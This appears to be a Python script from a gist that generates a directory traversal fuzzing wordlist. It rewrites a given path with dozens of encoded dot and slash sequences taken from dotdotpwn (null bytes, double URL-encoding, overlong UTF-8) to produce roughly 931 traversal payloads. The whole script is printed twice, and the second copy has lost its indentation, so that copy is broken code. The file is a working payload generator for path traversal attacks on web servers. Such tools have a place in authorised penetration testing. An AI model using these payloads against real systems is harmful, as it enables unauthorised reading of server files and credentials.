haccer/encode.py

## encode.py
#!/usr/bin/env python3
# An overkill directory traversal fuzzing wordlist generator.
# Creates approx. 931 items.
import base64
import sys
import urllib.parse

string = sys.argv[1]

# Encodings taken dotdotpwn
dots = ["..",
        ".%00.",
        "..%00",
        "..%01",
        ".?", "??", "?.",
        "%5C..",
        ".%2e", "%2e.",
        ".../.",
        "..../",
        "%2e%2e", "%%c0%6e%c0%6e",
        "0x2e0x2e", "%c0.%c0.",
        "%252e%252e",
        "%c0%2e%c0%2e", "%c0%ae%c0%ae",
        "%c0%5e%c0%5e", "%c0%ee%c0%ee",
        "%c0%fe%c0%fe", "%uff0e%uff0e",
        "%%32%%65%%32%%65",
        "%e0%80%ae%e0%80%ae",
        "%25c0%25ae%25c0%25ae",
        "%f0%80%80%ae%f0%80%80%ae",
        "%f8%80%80%80%ae%f8%80%80%80%ae",
        "%fc%80%80%80%80%ae%fc%80%80%80%80%ae",
        "%u002e"]

slashes = ["/", "\\",
	"%2f", "%5c",
	"0x2f", "0x5c",
	"%252f", "%255c",
	"%c0%2f", "%c0%af", "%c0%5c", "%c1%9c", "%c1%pc",
	"%c0%9v", "%c0%qf", "%c1%8s", "%c1%1c", "%c1%af",
	"%bg%qf", "%u2215", "%u2216", "%uEFC8", "%uF025",
	"%%32%%66", "%%35%%63",
	"%e0%80%af",
	"%25c1%259c", "%25c0%25af",
	"%f0%80%80%af",
	"%f8%80%80%80%af"]

_list = [string]

for i in range(len(slashes)):
    _list.append(string.replace("/", slashes[i]).replace("\\", slashes[i]))

    for ii in range(len(dots)):
        _list.append(string.replace(".", dots[ii]))
        _list.append(string.replace(".", dots[ii]).replace("/", slashes[i]).replace("\\", slashes[i]))

_list.append(base64.b64encode(bytes(string, "utf-8")).decode())

for i in list(dict.fromkeys(_list)):
    print(i)
	#!/usr/bin/env python3
	# An overkill directory traversal fuzzing wordlist generator.
	# Creates approx. 931 items.
	import base64
	import sys
	import urllib.parse

	string = sys.argv[1]

	# Encodings taken dotdotpwn
	dots = ["..",
	".%00.",
	"..%00",
	"..%01",
	".?", "??", "?.",
	"%5C..",
	".%2e", "%2e.",
	".../.",
	"..../",
	"%2e%2e", "%%c0%6e%c0%6e",
	"0x2e0x2e", "%c0.%c0.",
	"%252e%252e",
	"%c0%2e%c0%2e", "%c0%ae%c0%ae",
	"%c0%5e%c0%5e", "%c0%ee%c0%ee",
	"%c0%fe%c0%fe", "%uff0e%uff0e",
	"%%32%%65%%32%%65",
	"%e0%80%ae%e0%80%ae",
	"%25c0%25ae%25c0%25ae",
	"%f0%80%80%ae%f0%80%80%ae",
	"%f8%80%80%80%ae%f8%80%80%80%ae",
	"%fc%80%80%80%80%ae%fc%80%80%80%80%ae",
	"%u002e"]

	slashes = ["/", "\\",
	"%2f", "%5c",
	"0x2f", "0x5c",
	"%252f", "%255c",
	"%c0%2f", "%c0%af", "%c0%5c", "%c1%9c", "%c1%pc",
	"%c0%9v", "%c0%qf", "%c1%8s", "%c1%1c", "%c1%af",
	"%bg%qf", "%u2215", "%u2216", "%uEFC8", "%uF025",
	"%%32%%66", "%%35%%63",
	"%e0%80%af",
	"%25c1%259c", "%25c0%25af",
	"%f0%80%80%af",
	"%f8%80%80%80%af"]

	_list = [string]

	for i in range(len(slashes)):
	_list.append(string.replace("/", slashes[i]).replace("\\", slashes[i]))

	for ii in range(len(dots)):
	_list.append(string.replace(".", dots[ii]))
	_list.append(string.replace(".", dots[ii]).replace("/", slashes[i]).replace("\\", slashes[i]))

	_list.append(base64.b64encode(bytes(string, "utf-8")).decode())

	for i in list(dict.fromkeys(_list)):
	print(i)